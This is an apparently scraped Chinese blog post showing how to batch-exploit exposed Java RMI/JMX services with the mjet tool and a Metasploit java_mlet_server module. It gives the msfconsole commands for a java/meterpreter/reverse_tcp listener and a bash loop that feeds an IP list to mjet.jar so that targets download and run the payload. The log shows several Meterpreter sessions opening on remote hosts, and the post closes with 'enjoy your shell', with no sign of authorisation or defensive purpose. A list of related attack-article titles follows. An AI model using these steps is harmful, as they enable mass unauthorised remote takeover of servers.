声明:不会Java。

参考:https://www.secpulse.com/archives/6203.html

下载mjet,https://github.com/mogwaisec/mjet

按照说明中的步骤:

  • Copy the "MBean" folder to "data/java/metasploit"
  • Copy java_mlet_server.rb to "modules/exploits/multi/misc/"

这里有个坑,metasploit默认目录里没有data/java/这个目录,需要手动创建一下,而且里面缺少Payload.class这个类,find命令找一下,因为每个人的这个class位置都可能不一样。然后把它拷进/data/java/metasploit/下

启动msf监听,选择刚才导入的那个模块

 msf > use exploit/multi/misc/java_mlet_server

 msf exploit(multi/misc/java_mlet_server) > set payload java/meterpreter/reverse_tcp

 payload => java/meterpreter/reverse_tcp

 msf exploit(multi/misc/java_mlet_server) > set LHOST 1.1.1.1

 LHOST => 1.1.1.1

 msf exploit(multi/misc/java_mlet_server) > set LPORT

 LPORT =>

 msf exploit(multi/misc/java_mlet_server) > set URIPATH /bobac/

 URIPATH => /bobac/

 msf exploit(multi/misc/java_mlet_server) > run

 [*] Started reverse TCP handler on 1.1.1.1:

 [*] Using URL: http://0.0.0.0:8080/bobac/

 [*] Local IP: http://1.1.1.1:8080/bobac/

 [*] Server started.

然后用下载的mjet.jar让远程主机主动连接我的服务器,批量利用可以写一个shell脚本。

 #!/bin/bash

 function getip(){

 while read i

 do

     timeout 2s java -jar mjet.jar -u http://1.1.1.1:8080/bobac/ -t `echo $i|awk '{print $1}'` -p `echo $i|awk '{print $2}'`

 done < rmi-ip.txt

 }

 getip

rmi-ip.txt是存放的ip与端口文件,直接执行。msf监听到并且直接获取会话session。

 msf exploit(multi/misc/java_mlet_server) >

 [*] x.x.x.x java_mlet_server - handling request for /bobac/

 [*] Sending stage ( bytes) to x.x.x.x

 [*] Meterpreter session  opened (x.x.x.x: -> x.x.x.x:) at -- :: +

 [*] x.x.x.x java_mlet_server - handling request for /bobac/

 [*] Sending stage ( bytes) to x.x.x.x

 [*] Meterpreter session  opened (x.x.x.x: -> x.x.x.x:) at -- :: +

 [*] x.x.x.x java_mlet_server - handling request for /bobac/

 [*] Sending stage ( bytes) to x.x.x.x

 [*] Meterpreter session  opened (x.x.x.x: -> x.x.x.x:) at -- :: +

 [*] x.x.x.x java_mlet_server - handling request for /bobac/

 [*] x.x.x.x java_mlet_server - handling request for /bobac/

 [*] x.x.x.x java_mlet_server - handling request for /bobac/nhUsuayJ.jar

 [*] Sending stage ( bytes) to x.x.x.x

 [*] Meterpreter session  opened (x.x.x.x: -> x.x.x.x:) at -- :: +

6个,sessions -i 找一个进去

--enjoy your shell :)

利用MSF批量打RMI漏洞的更多相关文章

  1. 实战!利用MSF批量扫描校园网中含有MS17_010漏洞的主机并入侵

    利用ms17_010的永恒之蓝在前些日子火爆了一段时间,校园网中也声称封锁了相应端口.最近在搞MSF的深入学习,于是有了下文. ms17_010扫描工具 msf中的辅助模块含有一个强大的ms17_01 ...

  2. ms17-010 利用msf的exp和一个扫描工具的复现

    0x01简介 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码. 攻击对象:win7及win7以下的操作系统且开启了445端口s ...

  3. 利用Axis2默认口令安全漏洞可入侵WebService网站

    利用Axis2默认口令安全漏洞可入侵WebService网站 近期,在乌云上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基 ...

  4. 利用sql批量删除表,存储过程

    利用sql批量删除表,存储过程. 最近用godaddy的空间,由于系统里面的表多,一个个的删除很麻烦,就网上搜集了一下解决方法. 给大家分享一下: 1.批量删除存储过程 declare @procNa ...

  5. 利用Ossim系统进行主机漏洞扫描

    利用Ossim系统进行主机漏洞扫描 企业中查找漏洞要付出很大的努力,不能简单的在服务器上安装一个漏洞扫描软件那么简单,那样起不了多大作用.这并不是因为企业中拥有大量服务器和主机设备,这些服务器和设备又 ...

  6. 利用Excel批量高速发送电子邮件

    利用Excel批量高速发送电子邮件,分两步: 1. 准备待发送的数据: a.) 打开Excel,新建Book1.xlsx b.) 填入以下的内容, 第一列:接收人,第二列:邮件标题,第三列:正文,第四 ...

  7. 利用 bat 批量处理命令实现手动控制mysql /Oracle 服务的开启和关闭

    利用 bat 批量处理命令实现手动控制mysql /Oracle 服务的开启和关闭 因为最近在学习数据库的知识,主要学习的是oracle 数据库,然而好巧啊,java也是在学习,我们老师现在要我们做一 ...

  8. 利用foo函数的Bof漏洞攻击:构造攻击字符串

    利用foo函数的Bof漏洞攻击:构造攻击字符串 一.基础知识储备 objdump反汇编指令.gdb函数调试运行.Perl语言.|管道符 二.实验步骤 1. 通过反汇编了解程序功能及代码 ①反汇编查看文 ...

  9. JMeter 利用Jmeter批量数据库插入数据

    利用Jmeter批量数据库插入数据   by:授客 QQ:1033553122 1.   启动Jmeter 2.   添加 DBC Connection Configuration 右键线程组-> ...

随机推荐

  1. Splunk和ELK深度对比

    转自:http://blog.51cto.com/splunkchina/1948105 日志处理两大生态Splunk和ELK深度对比 heijunmasd 0人评论 5312人阅读 2017-07- ...

  2. Telerik 控件本地化

    一共四种方式: Localization using built-in resources Resource keys Localization using ResourceManager Local ...

  3. 《Maven实战》关联实际工作的核心知识

    通读了<Maven实战>这本书,由于在实际的工作中,对其有一定的操作上的经验.因此,再回头去通读这本书,就能够更加精准的把握里面的核心知识了. 以下我主要从两点去介绍之—— 1> m ...

  4. PHP学习7——文件系统

    主要内容: 打开和关闭文件 文件类型 文件处理 目录处理 访问远程文件 文件锁定 文件上传 数据除了可以存储在数据库中,我们主要的还是存储在文件中,而且存储在文件中更加的方便直接. 打开和关闭文件 打 ...

  5. isnull函数

    isnull是判断一个字段是否为空值,返回一个特定的值 列: isnull(a,0)  如果a字段有空值返回0 没有空值就返回a的本身 isnull(a,1)=2 字段a有空值返回1,判断isnull ...

  6. SpringMVC国际化配置

    一.什么是国际化: 国际化是设计软件应用的过程中应用被使用与不同语言和地区 国际化通常采用多属性文件的方式解决,每个属性文件保存一种语言的文字信息,    不同语言的用户看到的是不同的内容 二.spr ...

  7. JAVA学习之路(多线程)---模拟售票(细解)

    首先看题目描述: 假设有火车票100张,创建4个线程模拟4个售票点,每100ms售出一张,打印出售票过程,格式如下: 窗口3:卖出第100张票 窗口4:卖出第99张票 ............ ... ...

  8. Spring_Spring的特点

    一.非侵入式编程 Spring框架的API不会再业务逻辑上出现,即业务逻辑是POJO(Plain Ordinary Java Object).由于业务逻辑中没有Spring的API,所以业务逻辑可以从 ...

  9. zoj 3524(拓扑排序+多重背包)(好题)

    http://blog.csdn.net/woshi250hua/article/details/7824773 题目大意:从前有n座山,山里都有一座庙,庙里都有一个老和尚,老和尚专送纪念品,每个纪念 ...

  10. 读ios开发有感——建立APP开发体系

    前言:ios开发和现在的大前端.跨端开发在底层上的道理是相通的,因此通过学习ios开发,可以形成对APP开发体系的理解. 一.app开发的知识体系 基础 应用开发 原理 原生与前端 二.基础模块 按照 ...